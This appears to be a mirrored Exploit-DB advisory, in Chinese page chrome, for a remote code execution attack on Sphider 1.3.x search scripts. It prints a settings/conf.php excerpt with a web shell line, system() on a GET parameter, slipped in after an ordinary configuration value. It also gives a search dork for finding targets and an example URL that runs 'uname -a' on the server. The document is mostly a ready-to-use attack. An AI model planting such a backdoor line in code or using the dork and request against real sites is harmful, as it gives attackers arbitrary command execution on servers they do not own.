Sphider Script – Remote Code Execution

• Exploit Database
• 13 阅读

• 作者： XroGuE
  日期： 2010-06-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13745/

• =======================================================================
  # Sphider Script Remote Code Execution
  =======================================================================
  1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  0 _ __ __ __ 1
  1 /' \__/'__`\/\ \__/'__`\ 0
  0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1
  1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0
  0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1
  1\ \____/ >> Exploit database separated by exploit 0
  0 \/___/type (local, remote, DoS, etc.)1
  11
  0[+] Site: Inj3ct0r.com0
  1[+] Support e-mail: submit[at]inj3ct0r.com1
  00
  1####################################1
  0I'm XroGuE member from Inj3ct0r Team1
  1####################################0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  ########################################################################
  # Name: Sphider Script Remote Code Execution
  # Vendor: http://www.sphider.eu
  # Version: 1.3.x
  # Risk: Hight
  # Date: 2010-06-05
  # Author: XroGuE
  # Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
  # Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
  # Home: (-_+)
  ########################################################################
  
  ########################################################################
  
  [+] Vuln code : settings/conf.php
  
  *****************************************************************
  
  /*********************** 
  General settings 
  ***********************/
  
  // Sphider version 
  $version_nr = '1.3.5';
  
  //Language of the search page 
  $language = 'en';
  
  // Template name/directory in templates dir
  $template = 'standard';
  
  //Administrators email address (logs can be sent there) 
  $admin_email= 'admin@localhost';
  
  // Print spidering results to standard out
  $print_results= 1;
  
  // Temporary directory, this should be readable and writable
  $tmp_dir = 'tmp';
  
  
  /*********************** 
  Spider settings 
  ***********************/
  
  // Min words per page required for indexing 
  $min_words_per_page = 10; system($_GET[$language]);
  
  *****************************************************************
  
  [+] D0rk :"powered by sphider"
  
  
  [+] Ex: http://[target]/[path]/settings/conf.php?en=[Ev!l]
  
  
  [+] Demo: http://[site]/search/settings/conf.php?en=uname -a
  
  ########################################################################